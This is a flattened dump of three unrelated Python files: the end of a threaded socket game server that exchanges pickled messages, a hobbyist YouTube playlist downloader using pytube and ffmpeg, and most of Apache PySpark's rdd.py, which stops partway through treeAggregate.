conn.send(pickle.dumps(info)) elif data == "Get Opponent Attacks": info = games[clients[conn]].gameInformation(conn)["Opponent Attacks"] conn.send(pickle.dumps(info)) elif data == "Get Round Summary": #Will be a function in game that returns the dict with the carnage report and updated stats for all nanovor in the game #If waiting on other players, round summary will be "Waiting" info = games[clients[conn]].get_round_summary() conn.send(pickle.dumps(info)) #If the data is a dict, it has to be the information received from the client about their decisions elif type(data) == dict: #send it to a function that splits up all the information for each player, makes sure every player sent in their information, and #then applies those decisions to the engine, which runs all the behind-the scenes work games[clients[conn]].control_center(conn,data) conn.send(pickle.dumps("Received")) #Close the client connection conn.close() except Exception as e: exc_type, exc_obj, exc_tb = sys.exc_info() fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1] print(exc_type, fname, exc_tb.tb_lineno) finally: # Delete the game from the dict of games, if the client is in it and if the game hasn't been deleted # Iterate through a copy so it doesn't raise an error when dictionary for id, game in games.copy().items(): if conn in game.get_players().keys() and not game.gameOver(conn): game.handle_quitters(conn) #If the client disconnected but it isn't due to them quitting, that means the game is over, so remove them from the game. else: game.remove_player(conn) if len(game.get_players()) == 0: del games[id] if conn in clients: del clients[conn] while True: conn, addr = s.accept() thread = threading.Thread(target=handle_client, args=(conn, addr)) thread.start() print('Connected by', addr) print(f"[ACTIVE CONNECTIONS] {threading.active_count() - 1}")
main.py
from pytube import Playlist, YouTube from googleapiclient.discovery import build import requests import subprocess import os import time import json import re import threading lock = threading.Lock() sema = threading.Semaphore(10) WORKDIR = os.path.dirname(os.path.realpath(__file__)) + '/tmp5/' JSON_NAME = 'video_stats.json' JSON_PATH = WORKDIR + JSON_NAME json_template = { "name": "crwal_youtube", "platform": "youtube", "title": "default", "len": 0, "models": [ ]} def get_id(url: str): pattern = r'((?<=(v|V|e)/)|(?<=be/)|(?<=(\?|\&)v=)|(?<=embed/))([\w-]+)' return re.search(pattern, url).group() class result: def __init__(self): self.text = '' self.file_path = '' class _json: def __init__(self, title : str = None): global JSON_PATH _json.json_data = json_template if title: _json.json_data['title'] = title JSON_PATH = './' + title + '/' + JSON_NAME if not os.path.isfile(JSON_PATH): os.mkdir(os.path.dirname(JSON_PATH)) with open(JSON_PATH, 'w') as json_file: json.dump(_json.json_data, json_file, indent=4) else : with open(JSON_PATH, 'r') as json_file: _json.json_data = json.load(json_file) def sub_model(self, yt : YouTube, status: int, path : str = None, track : int = None): json_data = {} json_data['id'] = yt.video_id json_data['status'] = status if status > 0: if not track : track = _json.json_data['len'] + 1 json_data['meta'] = [] json_data['meta'].append({ 'title': yt.title, 'author': yt.author, 'track': track, 'len': yt.length, 'file_size': os.path.getsize(path), 'uploaded': False }) _json.json_data['len'] += 1 _json.json_data['models'].append(json_data) with open(JSON_PATH, 'w') as outfile: json.dump(_json.json_data, outfile, indent=4) def _YouTube(url: str): try: yt = YouTube(url) except Exception as err: if 'unavailable' in str(err): return 'blocked_error' if 'regex_search' in str(err): return 'worng_url_error' return yt def download_video(url, yt): _result = result() file_id = yt.video_id file_name = yt.title video_stream = yt.streams.filter(adaptive=True, file_extension='mp4', only_video=True).order_by( 'resolution').desc().first().download(WORKDIR, file_id + 'video') audio_stream = yt.streams.filter(adaptive=True, file_extension='mp4', only_audio=True).order_by( 'abr').desc().first().download(WORKDIR, file_id + 'audio') lock.acquire() process = subprocess.Popen(['ffmpeg', '-y', '-i', WORKDIR + '/' + file_id + 'video.mp4', '-i', WORKDIR + '/' + file_id + 'audio.mp4', WORKDIR + '/' + file_name.replace('/', '-') + '.mp4'], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) out, err = process.communicate() exitcode = process.returncode lock.release() file_path = WORKDIR + '/' + file_name.replace('/', '-') + '.mp4' if exitcode != 0: print(exitcode, out.decode('utf8'), err.decode('utf8')) _result.text = 'download_failed' else: _result.text = 'completed' _result.file_path = file_path if(os.path.isfile(video_stream)): os.remove(video_stream) if(os.path.isfile(audio_stream)): os.remove(audio_stream) return _result def try_download(yt, i = None): print(yt.title) if yt == 'worng_url_error': print('Worng url ㅗ') elif yt == 'blocked_error': print('막혔음 ㅅㄱ') j.sub_model(url, -1) else : result = download_video(url, yt) if result.text == 'completed': j.sub_model(yt, 1, result.file_path, i) elif result.text == 'download_failed': j.sub_model(yt, 0, i) if __name__ == '__main__': j = _json() t1 = time.time() url = input('url : ') file_ext = input('extension : ') if('list=' in url): p = Playlist(url) j = _json(p.title) WORKDIR = './' + p.title i = 1 def 이름짓기싫다(uyl,i): sema.acquire() yt = _YouTube(url) try_download(yt, i) sema.release() threads = [] for url in p.video_urls: th = threading.Thread(target=이름짓기싫다,args=(url, i)) th.start() threads.append(th) i+=1 for th in threads: th.join() else: yt = _YouTube(url) try_download(yt) print(time.time()-t1)
rdd.py
# # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import copy import sys import os import re import operator import shlex import warnings import heapq import bisect import random import socket from subprocess import Popen, PIPE from tempfile import NamedTemporaryFile from threading import Thread from collections import defaultdict from itertools import chain from functools import reduce from math import sqrt, log, isinf, isnan, pow, ceil if sys.version > '3': basestring = unicode = str else: from itertools import imap as map, ifilter as filter from pyspark.serializers import NoOpSerializer, CartesianDeserializer, \ BatchedSerializer, CloudPickleSerializer, PairDeserializer, \ PickleSerializer, pack_long, AutoBatchedSerializer from pyspark.join import python_join, python_left_outer_join, \ python_right_outer_join, python_full_outer_join, python_cogroup from pyspark.statcounter import StatCounter from pyspark.rddsampler import RDDSampler, RDDRangeSampler, RDDStratifiedSampler from pyspark.storagelevel import StorageLevel from pyspark.resultiterable import ResultIterable from pyspark.shuffle import Aggregator, ExternalMerger, \ get_used_memory, ExternalSorter, ExternalGroupBy from pyspark.traceback_utils import SCCallSiteSync __all__ = ["RDD"] def portable_hash(x): """ This function returns consistent hash code for builtin types, especially for None and tuple with None. The algorithm is similar to that one used by CPython 2.7 >>> portable_hash(None) 0 >>> portable_hash((None, 1)) & 0xffffffff 219750521 """ if sys.version_info >= (3, 2, 3) and 'PYTHONHASHSEED' not in os.environ: raise Exception("Randomness of hash of string should be disabled via PYTHONHASHSEED") if x is None: return 0 if isinstance(x, tuple): h = 0x345678 for i in x: h ^= portable_hash(i) h *= 1000003 h &= sys.maxsize h ^= len(x) if h == -1: h = -2 return int(h) return hash(x) class BoundedFloat(float): """ Bounded value is generated by approximate job, with confidence and low bound and high bound. >>> BoundedFloat(100.0, 0.95, 95.0, 105.0) 100.0 """ def __new__(cls, mean, confidence, low, high): obj = float.__new__(cls, mean) obj.confidence = confidence obj.low = low obj.high = high return obj def _parse_memory(s): """ Parse a memory string in the format supported by Java (e.g. 1g, 200m) and return the value in MB >>> _parse_memory("256m") 256 >>> _parse_memory("2g") 2048 """ units = {'g': 1024, 'm': 1, 't': 1 << 20, 'k': 1.0 / 1024} if s[-1].lower() not in units: raise ValueError("invalid format: " + s) return int(float(s[:-1]) * units[s[-1].lower()]) def _load_from_socket(port, serializer): sock = None # Support for both IPv4 and IPv6. # On most of IPv6-ready systems, IPv6 will take precedence. for res in socket.getaddrinfo("localhost", port, socket.AF_UNSPEC, socket.SOCK_STREAM): af, socktype, proto, canonname, sa = res sock = socket.socket(af, socktype, proto) try: sock.settimeout(15) sock.connect(sa) except socket.error: sock.close() sock = None continue break if not sock: raise Exception("could not open socket") # The RDD materialization time is unpredicable, if we set a timeout for socket reading # operation, it will very possibly fail. See SPARK-18281. sock.settimeout(None) # The socket will be automatically closed when garbage-collected. return serializer.load_stream(sock.makefile("rb", 65536)) def ignore_unicode_prefix(f): """ Ignore the 'u' prefix of string in doc tests, to make it works in both python 2 and 3 """ if sys.version >= '3': # the representation of unicode string in Python 3 does not have prefix 'u', # so remove the prefix 'u' for doc tests literal_re = re.compile(r"(\W|^)[uU](['])", re.UNICODE) f.__doc__ = literal_re.sub(r'\1\2', f.__doc__) return f class Partitioner(object): def __init__(self, numPartitions, partitionFunc): self.numPartitions = numPartitions self.partitionFunc = partitionFunc def __eq__(self, other): return (isinstance(other, Partitioner) and self.numPartitions == other.numPartitions and self.partitionFunc == other.partitionFunc) def __call__(self, k): return self.partitionFunc(k) % self.numPartitions class RDD(object): """ A Resilient Distributed Dataset (RDD), the basic abstraction in Spark. Represents an immutable, partitioned collection of elements that can be operated on in parallel. """ def __init__(self, jrdd, ctx, jrdd_deserializer=AutoBatchedSerializer(PickleSerializer())): self._jrdd = jrdd self.is_cached = False self.is_checkpointed = False self.ctx = ctx self._jrdd_deserializer = jrdd_deserializer self._id = jrdd.id() self.partitioner = None def _pickled(self): return self._reserialize(AutoBatchedSerializer(PickleSerializer())) def id(self): """ A unique ID for this RDD (within its SparkContext). """ return self._id def __repr__(self): return self._jrdd.toString() def __getnewargs__(self): # This method is called when attempting to pickle an RDD, which is always an error: raise Exception( "It appears that you are attempting to broadcast an RDD or reference an RDD from an " "action or transformation. RDD transformations and actions can only be invoked by the " "driver, not inside of other transformations; for example, " "rdd1.map(lambda x: rdd2.values.count() * x) is invalid because the values " "transformation and count action cannot be performed inside of the rdd1.map " "transformation. For more information, see SPARK-5063." ) @property def context(self): """ The L{SparkContext} that this RDD was created on. """ return self.ctx def cache(self): """ Persist this RDD with the default storage level (C{MEMORY_ONLY}). """ self.is_cached = True self.persist(StorageLevel.MEMORY_ONLY) return self def persist(self, storageLevel=StorageLevel.MEMORY_ONLY): """ Set this RDD's storage level to persist its values across operations after the first time it is computed. This can only be used to assign a new storage level if the RDD does not have a storage level set yet. If no storage level is specified defaults to (C{MEMORY_ONLY}). >>> rdd = sc.parallelize(["b", "a", "c"]) >>> rdd.persist().is_cached True """ self.is_cached = True javaStorageLevel = self.ctx._getJavaStorageLevel(storageLevel) self._jrdd.persist(javaStorageLevel) return self def unpersist(self): """ Mark the RDD as non-persistent, and remove all blocks for it from memory and disk. """ self.is_cached = False self._jrdd.unpersist() return self def checkpoint(self): """ Mark this RDD for checkpointing. It will be saved to a file inside the checkpoint directory set with L{SparkContext.setCheckpointDir()} and all references to its parent RDDs will be removed. This function must be called before any job has been executed on this RDD. It is strongly recommended that this RDD is persisted in memory, otherwise saving it on a file will require recomputation. """ self.is_checkpointed = True self._jrdd.rdd().checkpoint() def isCheckpointed(self): """ Return whether this RDD is checkpointed and materialized, either reliably or locally. """ return self._jrdd.rdd().isCheckpointed() def localCheckpoint(self): """ Mark this RDD for local checkpointing using Spark's existing caching layer. This method is for users who wish to truncate RDD lineages while skipping the expensive step of replicating the materialized data in a reliable distributed file system. This is useful for RDDs with long lineages that need to be truncated periodically (e.g. GraphX). Local checkpointing sacrifices fault-tolerance for performance. In particular, checkpointed data is written to ephemeral local storage in the executors instead of to a reliable, fault-tolerant storage. The effect is that if an executor fails during the computation, the checkpointed data may no longer be accessible, causing an irrecoverable job failure. This is NOT safe to use with dynamic allocation, which removes executors along with their cached blocks. If you must use both features, you are advised to set L{spark.dynamicAllocation.cachedExecutorIdleTimeout} to a high value. The checkpoint directory set through L{SparkContext.setCheckpointDir()} is not used. """ self._jrdd.rdd().localCheckpoint() def isLocallyCheckpointed(self): """ Return whether this RDD is marked for local checkpointing. Exposed for testing. """ return self._jrdd.rdd().isLocallyCheckpointed() def getCheckpointFile(self): """ Gets the name of the file to which this RDD was checkpointed Not defined if RDD is checkpointed locally. """ checkpointFile = self._jrdd.rdd().getCheckpointFile() if checkpointFile.isDefined(): return checkpointFile.get() def map(self, f, preservesPartitioning=False): """ Return a new RDD by applying a function to each element of this RDD. >>> rdd = sc.parallelize(["b", "a", "c"]) >>> sorted(rdd.map(lambda x: (x, 1)).collect()) [('a', 1), ('b', 1), ('c', 1)] """ def func(_, iterator): return map(f, iterator) return self.mapPartitionsWithIndex(func, preservesPartitioning) def flatMap(self, f, preservesPartitioning=False): """ Return a new RDD by first applying a function to all elements of this RDD, and then flattening the results. >>> rdd = sc.parallelize([2, 3, 4]) >>> sorted(rdd.flatMap(lambda x: range(1, x)).collect()) [1, 1, 1, 2, 2, 3] >>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect()) [(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)] """ def func(s, iterator): return chain.from_iterable(map(f, iterator)) return self.mapPartitionsWithIndex(func, preservesPartitioning) def mapPartitions(self, f, preservesPartitioning=False): """ Return a new RDD by applying a function to each partition of this RDD. >>> rdd = sc.parallelize([1, 2, 3, 4], 2) >>> def f(iterator): yield sum(iterator) >>> rdd.mapPartitions(f).collect() [3, 7] """ def func(s, iterator): return f(iterator) return self.mapPartitionsWithIndex(func, preservesPartitioning) def mapPartitionsWithIndex(self, f, preservesPartitioning=False): """ Return a new RDD by applying a function to each partition of this RDD, while tracking the index of the original partition. >>> rdd = sc.parallelize([1, 2, 3, 4], 4) >>> def f(splitIndex, iterator): yield splitIndex >>> rdd.mapPartitionsWithIndex(f).sum() 6 """ return PipelinedRDD(self, f, preservesPartitioning) def mapPartitionsWithSplit(self, f, preservesPartitioning=False): """ Deprecated: use mapPartitionsWithIndex instead. Return a new RDD by applying a function to each partition of this RDD, while tracking the index of the original partition. >>> rdd = sc.parallelize([1, 2, 3, 4], 4) >>> def f(splitIndex, iterator): yield splitIndex >>> rdd.mapPartitionsWithSplit(f).sum() 6 """ warnings.warn("mapPartitionsWithSplit is deprecated; " "use mapPartitionsWithIndex instead", DeprecationWarning, stacklevel=2) return self.mapPartitionsWithIndex(f, preservesPartitioning) def getNumPartitions(self): """ Returns the number of partitions in RDD >>> rdd = sc.parallelize([1, 2, 3, 4], 2) >>> rdd.getNumPartitions() 2 """ return self._jrdd.partitions().size() def filter(self, f): """ Return a new RDD containing only the elements that satisfy a predicate. >>> rdd = sc.parallelize([1, 2, 3, 4, 5]) >>> rdd.filter(lambda x: x % 2 == 0).collect() [2, 4] """ def func(iterator): return filter(f, iterator) return self.mapPartitions(func, True) def distinct(self, numPartitions=None): """ Return a new RDD containing the distinct elements in this RDD. >>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect()) [1, 2, 3] """ return self.map(lambda x: (x, None)) \ .reduceByKey(lambda x, _: x, numPartitions) \ .map(lambda x: x[0]) def sample(self, withReplacement, fraction, seed=None): """ Return a sampled subset of this RDD. :param withReplacement: can elements be sampled multiple times (replaced when sampled out) :param fraction: expected size of the sample as a fraction of this RDD's size without replacement: probability that each element is chosen; fraction must be [0, 1] with replacement: expected number of times each element is chosen; fraction must be >= 0 :param seed: seed for the random number generator .. note:: This is not guaranteed to provide exactly the fraction specified of the total count of the given :class:`DataFrame`. >>> rdd = sc.parallelize(range(100), 4) >>> 6 <= rdd.sample(False, 0.1, 81).count() <= 14 True """ assert fraction >= 0.0, "Negative fraction value: %s" % fraction return self.mapPartitionsWithIndex(RDDSampler(withReplacement, fraction, seed).func, True) def randomSplit(self, weights, seed=None): """ Randomly splits this RDD with the provided weights. :param weights: weights for splits, will be normalized if they don't sum to 1 :param seed: random seed :return: split RDDs in a list >>> rdd = sc.parallelize(range(500), 1) >>> rdd1, rdd2 = rdd.randomSplit([2, 3], 17) >>> len(rdd1.collect() + rdd2.collect()) 500 >>> 150 < rdd1.count() < 250 True >>> 250 < rdd2.count() < 350 True """ s = float(sum(weights)) cweights = [0.0] for w in weights: cweights.append(cweights[-1] + w / s) if seed is None: seed = random.randint(0, 2 ** 32 - 1) return [self.mapPartitionsWithIndex(RDDRangeSampler(lb, ub, seed).func, True) for lb, ub in zip(cweights, cweights[1:])] # this is ported from scala/spark/RDD.scala def takeSample(self, withReplacement, num, seed=None): """ Return a fixed-size sampled subset of this RDD. .. note:: This method should only be used if the resulting array is expected to be small, as all the data is loaded into the driver's memory. >>> rdd = sc.parallelize(range(0, 10)) >>> len(rdd.takeSample(True, 20, 1)) 20 >>> len(rdd.takeSample(False, 5, 2)) 5 >>> len(rdd.takeSample(False, 15, 3)) 10 """ numStDev = 10.0 if num < 0: raise ValueError("Sample size cannot be negative.") elif num == 0: return [] initialCount = self.count() if initialCount == 0: return [] rand = random.Random(seed) if (not withReplacement) and num >= initialCount: # shuffle current RDD and return samples = self.collect() rand.shuffle(samples) return samples maxSampleSize = sys.maxsize - int(numStDev * sqrt(sys.maxsize)) if num > maxSampleSize: raise ValueError( "Sample size cannot be greater than %d." % maxSampleSize) fraction = RDD._computeFractionForSampleSize( num, initialCount, withReplacement) samples = self.sample(withReplacement, fraction, seed).collect() # If the first sample didn't turn out large enough, keep trying to take samples; # this shouldn't happen often because we use a big multiplier for their initial size. # See: scala/spark/RDD.scala while len(samples) < num: # TODO: add log warning for when more than one iteration was run seed = rand.randint(0, sys.maxsize) samples = self.sample(withReplacement, fraction, seed).collect() rand.shuffle(samples) return samples[0:num] @staticmethod def _computeFractionForSampleSize(sampleSizeLowerBound, total, withReplacement): """ Returns a sampling rate that guarantees a sample of size >= sampleSizeLowerBound 99.99% of the time. How the sampling rate is determined: Let p = num / total, where num is the sample size and total is the total number of data points in the RDD. We're trying to compute q > p such that - when sampling with replacement, we're drawing each data point with prob_i ~ Pois(q), where we want to guarantee Pr[s < num] < 0.0001 for s = sum(prob_i for i from 0 to total), i.e. the failure rate of not having a sufficiently large sample < 0.0001. Setting q = p + 5 * sqrt(p/total) is sufficient to guarantee 0.9999 success rate for num > 12, but we need a slightly larger q (9 empirically determined). - when sampling without replacement, we're drawing each data point with prob_i ~ Binomial(total, fraction) and our choice of q guarantees 1-delta, or 0.9999 success rate, where success rate is defined the same as in sampling with replacement. """ fraction = float(sampleSizeLowerBound) / total if withReplacement: numStDev = 5 if (sampleSizeLowerBound < 12): numStDev = 9 return fraction + numStDev * sqrt(fraction / total) else: delta = 0.00005 gamma = - log(delta) / total return min(1, fraction + gamma + sqrt(gamma * gamma + 2 * gamma * fraction)) def union(self, other): """ Return the union of this RDD and another one. >>> rdd = sc.parallelize([1, 1, 2, 3]) >>> rdd.union(rdd).collect() [1, 1, 2, 3, 1, 1, 2, 3] """ if self._jrdd_deserializer == other._jrdd_deserializer: rdd = RDD(self._jrdd.union(other._jrdd), self.ctx, self._jrdd_deserializer) else: # These RDDs contain data in different serialized formats, so we # must normalize them to the default serializer. self_copy = self._reserialize() other_copy = other._reserialize() rdd = RDD(self_copy._jrdd.union(other_copy._jrdd), self.ctx, self.ctx.serializer) if (self.partitioner == other.partitioner and self.getNumPartitions() == rdd.getNumPartitions()): rdd.partitioner = self.partitioner return rdd def intersection(self, other): """ Return the intersection of this RDD and another one. The output will not contain any duplicate elements, even if the input RDDs did. .. note:: This method performs a shuffle internally. >>> rdd1 = sc.parallelize([1, 10, 2, 3, 4, 5]) >>> rdd2 = sc.parallelize([1, 6, 2, 3, 7, 8]) >>> rdd1.intersection(rdd2).collect() [1, 2, 3] """ return self.map(lambda v: (v, None)) \ .cogroup(other.map(lambda v: (v, None))) \ .filter(lambda k_vs: all(k_vs[1])) \ .keys() def _reserialize(self, serializer=None): serializer = serializer or self.ctx.serializer if self._jrdd_deserializer != serializer: self = self.map(lambda x: x, preservesPartitioning=True) self._jrdd_deserializer = serializer return self def __add__(self, other): """ Return the union of this RDD and another one. >>> rdd = sc.parallelize([1, 1, 2, 3]) >>> (rdd + rdd).collect() [1, 1, 2, 3, 1, 1, 2, 3] """ if not isinstance(other, RDD): raise TypeError return self.union(other) def repartitionAndSortWithinPartitions(self, numPartitions=None, partitionFunc=portable_hash, ascending=True, keyfunc=lambda x: x): """ Repartition the RDD according to the given partitioner and, within each resulting partition, sort records by their keys. >>> rdd = sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)]) >>> rdd2 = rdd.repartitionAndSortWithinPartitions(2, lambda x: x % 2, 2) >>> rdd2.glom().collect() [[(0, 5), (0, 8), (2, 6)], [(1, 3), (3, 8), (3, 8)]] """ if numPartitions is None: numPartitions = self._defaultReducePartitions() memory = _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m")) serializer = self._jrdd_deserializer def sortPartition(iterator): sort = ExternalSorter(memory * 0.9, serializer).sorted return iter(sort(iterator, key=lambda k_v: keyfunc(k_v[0]), reverse=(not ascending))) return self.partitionBy(numPartitions, partitionFunc).mapPartitions(sortPartition, True) def sortByKey(self, ascending=True, numPartitions=None, keyfunc=lambda x: x): """ Sorts this RDD, which is assumed to consist of (key, value) pairs. # noqa >>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)] >>> sc.parallelize(tmp).sortByKey().first() ('1', 3) >>> sc.parallelize(tmp).sortByKey(True, 1).collect() [('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)] >>> sc.parallelize(tmp).sortByKey(True, 2).collect() [('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)] >>> tmp2 = [('Mary', 1), ('had', 2), ('a', 3), ('little', 4), ('lamb', 5)] >>> tmp2.extend([('whose', 6), ('fleece', 7), ('was', 8), ('white', 9)]) >>> sc.parallelize(tmp2).sortByKey(True, 3, keyfunc=lambda k: k.lower()).collect() [('a', 3), ('fleece', 7), ('had', 2), ('lamb', 5),...('white', 9), ('whose', 6)] """ if numPartitions is None: numPartitions = self._defaultReducePartitions() memory = self._memory_limit() serializer = self._jrdd_deserializer def sortPartition(iterator): sort = ExternalSorter(memory * 0.9, serializer).sorted return iter(sort(iterator, key=lambda kv: keyfunc(kv[0]), reverse=(not ascending))) if numPartitions == 1: if self.getNumPartitions() > 1: self = self.coalesce(1) return self.mapPartitions(sortPartition, True) # first compute the boundary of each part via sampling: we want to partition # the key-space into bins such that the bins have roughly the same # number of (key, value) pairs falling into them rddSize = self.count() if not rddSize: return self # empty RDD maxSampleSize = numPartitions * 20.0 # constant from Spark's RangePartitioner fraction = min(maxSampleSize / max(rddSize, 1), 1.0) samples = self.sample(False, fraction, 1).map(lambda kv: kv[0]).collect() samples = sorted(samples, key=keyfunc) # we have numPartitions many parts but one of the them has # an implicit boundary bounds = [samples[int(len(samples) * (i + 1) / numPartitions)] for i in range(0, numPartitions - 1)] def rangePartitioner(k): p = bisect.bisect_left(bounds, keyfunc(k)) if ascending: return p else: return numPartitions - 1 - p return self.partitionBy(numPartitions, rangePartitioner).mapPartitions(sortPartition, True) def sortBy(self, keyfunc, ascending=True, numPartitions=None): """ Sorts this RDD by the given keyfunc >>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)] >>> sc.parallelize(tmp).sortBy(lambda x: x[0]).collect() [('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)] >>> sc.parallelize(tmp).sortBy(lambda x: x[1]).collect() [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)] """ return self.keyBy(keyfunc).sortByKey(ascending, numPartitions).values() def glom(self): """ Return an RDD created by coalescing all elements within each partition into a list. >>> rdd = sc.parallelize([1, 2, 3, 4], 2) >>> sorted(rdd.glom().collect()) [[1, 2], [3, 4]] """ def func(iterator): yield list(iterator) return self.mapPartitions(func) def cartesian(self, other): """ Return the Cartesian product of this RDD and another one, that is, the RDD of all pairs of elements C{(a, b)} where C{a} is in C{self} and C{b} is in C{other}. >>> rdd = sc.parallelize([1, 2]) >>> sorted(rdd.cartesian(rdd).collect()) [(1, 1), (1, 2), (2, 1), (2, 2)] """ # Due to batching, we can't use the Java cartesian method. deserializer = CartesianDeserializer(self._jrdd_deserializer, other._jrdd_deserializer) return RDD(self._jrdd.cartesian(other._jrdd), self.ctx, deserializer) def groupBy(self, f, numPartitions=None, partitionFunc=portable_hash): """ Return an RDD of grouped items. >>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8]) >>> result = rdd.groupBy(lambda x: x % 2).collect() >>> sorted([(x, sorted(y)) for (x, y) in result]) [(0, [2, 8]), (1, [1, 1, 3, 5])] """ return self.map(lambda x: (f(x), x)).groupByKey(numPartitions, partitionFunc) @ignore_unicode_prefix def pipe(self, command, env=None, checkCode=False): """ Return an RDD created by piping elements to a forked external process. >>> sc.parallelize(['1', '2', '', '3']).pipe('cat').collect() [u'1', u'2', u'', u'3'] :param checkCode: whether or not to check the return value of the shell command. """ if env is None: env = dict() def func(iterator): pipe = Popen( shlex.split(command), env=env, stdin=PIPE, stdout=PIPE) def pipe_objs(out): for obj in iterator: s = str(obj).rstrip('\n') + '\n' out.write(s.encode('utf-8')) out.close() Thread(target=pipe_objs, args=[pipe.stdin]).start() def check_return_code(): pipe.wait() if checkCode and pipe.returncode: raise Exception("Pipe function `%s' exited " "with error code %d" % (command, pipe.returncode)) else: for i in range(0): yield i return (x.rstrip(b'\n').decode('utf-8') for x in chain(iter(pipe.stdout.readline, b''), check_return_code())) return self.mapPartitions(func) def foreach(self, f): """ Applies a function to all elements of this RDD. >>> def f(x): print(x) >>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f) """ def processPartition(iterator): for x in iterator: f(x) return iter([]) self.mapPartitions(processPartition).count() # Force evaluation def foreachPartition(self, f): """ Applies a function to each partition of this RDD. >>> def f(iterator): ... for x in iterator: ... print(x) >>> sc.parallelize([1, 2, 3, 4, 5]).foreachPartition(f) """ def func(it): r = f(it) try: return iter(r) except TypeError: return iter([]) self.mapPartitions(func).count() # Force evaluation def collect(self): """ Return a list that contains all of the elements in this RDD. .. note:: This method should only be used if the resulting array is expected to be small, as all the data is loaded into the driver's memory. """ with SCCallSiteSync(self.context) as css: port = self.ctx._jvm.PythonRDD.collectAndServe(self._jrdd.rdd()) return list(_load_from_socket(port, self._jrdd_deserializer)) def reduce(self, f): """ Reduces the elements of this RDD using the specified commutative and associative binary operator. Currently reduces partitions locally. >>> from operator import add >>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add) 15 >>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add) 10 >>> sc.parallelize([]).reduce(add) Traceback (most recent call last): ... ValueError: Can not reduce() empty RDD """ def func(iterator): iterator = iter(iterator) try: initial = next(iterator) except StopIteration: return yield reduce(f, iterator, initial) vals = self.mapPartitions(func).collect() if vals: return reduce(f, vals) raise ValueError("Can not reduce() empty RDD") def treeReduce(self, f, depth=2): """ Reduces the elements of this RDD in a multi-level tree pattern. :param depth: suggested depth of the tree (default: 2) >>> add = lambda x, y: x + y >>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10) >>> rdd.treeReduce(add) -5 >>> rdd.treeReduce(add, 1) -5 >>> rdd.treeReduce(add, 2) -5 >>> rdd.treeReduce(add, 5) -5 >>> rdd.treeReduce(add, 10) -5 """ if depth < 1: raise ValueError("Depth cannot be smaller than 1 but got %d." % depth) zeroValue = None, True # Use the second entry to indicate whether this is a dummy value. def op(x, y): if x[1]: return y elif y[1]: return x else: return f(x[0], y[0]), False reduced = self.map(lambda x: (x, False)).treeAggregate(zeroValue, op, op, depth) if reduced[1]: raise ValueError("Cannot reduce empty RDD.") return reduced[0] def fold(self, zeroValue, op): """ Aggregate the elements of each partition, and then the results for all the partitions, using a given associative function and a neutral "zero value." The function C{op(t1, t2)} is allowed to modify C{t1} and return it as its result value to avoid object allocation; however, it should not modify C{t2}. This behaves somewhat differently from fold operations implemented for non-distributed collections in functional languages like Scala. This fold operation may be applied to partitions individually, and then fold those results into the final result, rather than apply the fold to each element sequentially in some defined ordering. For functions that are not commutative, the result may differ from that of a fold applied to a non-distributed collection. >>> from operator import add >>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add) 15 """ def func(iterator): acc = zeroValue for obj in iterator: acc = op(acc, obj) yield acc # collecting result of mapPartitions here ensures that the copy of # zeroValue provided to each partition is unique from the one provided # to the final reduce call vals = self.mapPartitions(func).collect() return reduce(op, vals, zeroValue) def aggregate(self, zeroValue, seqOp, combOp): """ Aggregate the elements of each partition, and then the results for all the partitions, using a given combine functions and a neutral "zero value." The functions C{op(t1, t2)} is allowed to modify C{t1} and return it as its result value to avoid object allocation; however, it should not modify C{t2}. The first function (seqOp) can return a different result type, U, than the type of this RDD. Thus, we need one operation for merging a T into an U and one operation for merging two U >>> seqOp = (lambda x, y: (x[0] + y, x[1] + 1)) >>> combOp = (lambda x, y: (x[0] + y[0], x[1] + y[1])) >>> sc.parallelize([1, 2, 3, 4]).aggregate((0, 0), seqOp, combOp) (10, 4) >>> sc.parallelize([]).aggregate((0, 0), seqOp, combOp) (0, 0) """ def func(iterator): acc = zeroValue for obj in iterator: acc = seqOp(acc, obj) yield acc # collecting result of mapPartitions here ensures that the copy of # zeroValue provided to each partition is unique from the one provided # to the final reduce call vals = self.mapPartitions(func).collect() return reduce(combOp, vals, zeroValue) def treeAggregate(self, zeroValue, seqOp, combOp, depth=2): """ Aggregates the elements of this RDD in a multi-level tree pattern. :param depth: suggested depth of the tree (default: 2) >>> add = lambda x, y: x + y >>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10) >>> rdd.treeAggregate(0, add, add) -5 >>> rdd.treeAggregate(0, add, add, 1) -5 >>> rdd.treeAggregate(0, add, add, 2) -5 >>> rdd.treeAggregate(0, add, add, 5) -5 >>> rdd.treeAggregate(0, add, add, 10) -5 """ if depth < 1: raise ValueError("Depth cannot be smaller than 1 but got %d." % depth) if self.getNumPartitions() == 0: return zeroValue def aggregatePartition(iterator): acc = zeroValue for obj in iterator: acc = seqOp(acc, obj) yield acc partiallyAggregated = self.mapPartitions(aggregatePartition) numPartitions = partiallyAggregated.getNumPartitions() scale = max(int(ceil(pow(numPartitions, 1.0 / 